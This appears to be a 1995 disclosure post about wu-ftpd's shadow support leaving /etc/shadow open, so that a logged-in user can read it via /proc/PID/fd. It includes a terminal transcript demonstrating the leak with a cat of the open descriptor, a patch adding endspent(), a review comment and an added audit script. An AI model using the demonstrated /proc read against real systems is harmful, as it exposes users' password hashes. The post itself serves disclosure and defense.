This affects wu-ftpd and possibly any other programs with incorrectly hacked in shadow support. Non-shadow versions found in most Linux distributions are not affected - or are all affected and you can't fix it because /etc/passwd is world-readable, depending on how you look at it...

This is related to the /proc security problem discussed recently - normal users can read /etc/shadow because this file is not closed and /proc gives access to all open files.

Below is how to check if you are vulnerable:

Script started on Fri Jun 9 15:09:49 1995
marekm@i17linuxa:~$ ftp -n localhost
Connected to localhost.
220 i17linuxa FTP server (Version wu-2.4(2) Thu Jun 1 20:05:10 MET DST 1995) ready.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> user marekm
331 Password required for marekm.
Password:
230 User marekm logged in.
ftp> ^Z
[1]+ Stopped ftp -n localhost
marekm@i17linuxa:~$ ps uwx
USER     PID   %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND
marekm   15510 0.0  5.4  384  384 pp6 S    14:32 0:01 -bash
marekm   15808 0.2  2.2  29   156 pp6 S    15:09 0:00 script
marekm   15809 0.1  2.3  29   168 pp6 S    15:09 0:00 script
marekm   15810 1.3  6.7  377  472 pp4 S    15:09 0:00 bash -i
marekm   15811 0.7  3.9  113  276 pp4 T    15:09 0:00 ftp -n localhost
marekm   15812 2.0  7.1  157  500 con S    15:09 0:00 -localhost: marekm: IDLE
marekm   15816 0.0  3.1  64   224 pp4 R    15:10 0:00 ps uwx
marekm@i17linuxa:~$ ls -al /proc/15812/fd
total 0
dr-x------ 2 marekm users 0 Jun 9 15:10 .
dr-xr-xr-x 4 marekm users 0 Jun 9 15:10 ..
lrwx------ 1 marekm users 64 Jun 9 15:10 0 -> [0000]:0
lrwx------ 1 marekm users 64 Jun 9 15:10 1 -> [0000]:0
l-wx------ 1 marekm users 64 Jun 9 15:10 10 -> [0301]:4623
l-wx------ 1 marekm users 64 Jun 9 15:10 11 -> [0301]:4624
l-wx------ 1 marekm users 64 Jun 9 15:10 2 -> [0301]:10404
lrwx------ 1 marekm users 64 Jun 9 15:10 3 -> [0000]:0
lrwx------ 1 marekm users 64 Jun 9 15:10 4 -> [0000]:0
lr-x------ 1 marekm users 64 Jun 9 15:10 5 -> [0301]:38392
lr-x------ 1 marekm users 64 Jun 9 15:10 6 -> [0301]:8567
lrwx------ 1 marekm users 64 Jun 9 15:10 7 -> [0301]:34549
lr-x------ 1 marekm users 64 Jun 9 15:10 8 -> [0301]:8569
lr-x------ 1 marekm users 64 Jun 9 15:10 9 -> [0301]:32007
marekm@i17linuxa:~$ ls -i /etc/shadow
32007 /etc/shadow
marekm@i17linuxa:~$ cat /proc/15812/fd/9
[ snip - I don't want everyone to see my /etc/shadow :-) ]
marekm@i17linuxa:~$ fg
ftp -n localhost
221 Goodbye.
marekm@i17linuxa:~$ exit
Script done on Fri Jun 9 15:11:26 1995

OK, now for the fix:

--- ftpd.c.orig Thu Jun 1 19:27:42 1995 +++ ftpd.c Fri Jun 9 14:50:46 1995 @@ -996,6 +996,7 @@ struct spwd *spw = getspnam( pw->pw_name ); if( !spw ) { pw->pw_passwd = ""; } else { pw->pw_passwd = spw->sp_pwdp; } + endspent(); } #endif

Now /etc/shadow is correctly closed as soon as possible. The right fix is IMHO to do some more checks in the kernel to remove /proc holes, but I am not in a position to do it correctly... Linus, 1.2.10? :-)

Regards,
Marek Michalkiewicz
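
Review bot: the added endspent() call after the if/else leaves pw->pw_passwd pointing at spw->sp_pwdp, which is storage owned by the shadow routines rather than by ftpd; copying the string into ftpd's own buffer before calling endspent() would avoid depending on that storage staying valid once the database is closed. A short comment next to the call, saying it is there so the /etc/shadow descriptor does not stay open in the logged-in user's process, would also keep someone from removing it later as redundant.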
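
The manual check in the transcript (compare the inode of /etc/shadow with each entry under /proc/PID/fd) can be automated for an audit of every process on a host. This is an added example, not part of the original post or of wu-ftpd; the function name find_open_fds, its optional second argument and its output format are assumptions made here, and it generalizes the check to any target file.

```sh
#!/bin/sh
# Added example (not from the original post): report every process that
# holds an open descriptor on a given file, e.g. /etc/shadow.
#
# Usage: find_open_fds TARGET [PROC_ROOT]
#   TARGET     file to look for (for this post: /etc/shadow)
#   PROC_ROOT  proc mount point, default /proc (hypothetical parameter,
#              added so the function can be tested on a constructed tree)
# Prints one line "PID FD COMMAND" per matching descriptor.
# Returns 0 if at least one descriptor matched, 1 if none, 2 on bad input.
find_open_fds() {
    target=$1
    proc_root=${2:-/proc}
    [ -e "$target" ] || { echo "no such file: $target" >&2; return 2; }

    hits=0
    for fd in "$proc_root"/[0-9]*/fd/*; do
        # -ef follows the fd link and compares device and inode, which is
        # the same comparison done by hand with "ls -i" in the transcript.
        # Entries we cannot read or that vanished are simply skipped.
        [ "$fd" -ef "$target" ] 2>/dev/null || continue

        pid=${fd#"$proc_root"/}   # strip the proc root prefix
        pid=${pid%%/*}            # keep only the PID component
        comm=$(cat "$proc_root/$pid/comm" 2>/dev/null) || comm='?'

        printf '%s %s %s\n' "$pid" "${fd##*/}" "$comm"
        hits=$((hits + 1))
    done

    [ "$hits" -gt 0 ]
}

# Typical audit run (as root, so that every process's fd directory is
# readable):
#   find_open_fds /etc/shadow
```

Any line reported for a process that is running with a non-root uid after login, such as the per-session ftpd in the transcript, indicates the descriptor was left open across the privilege drop.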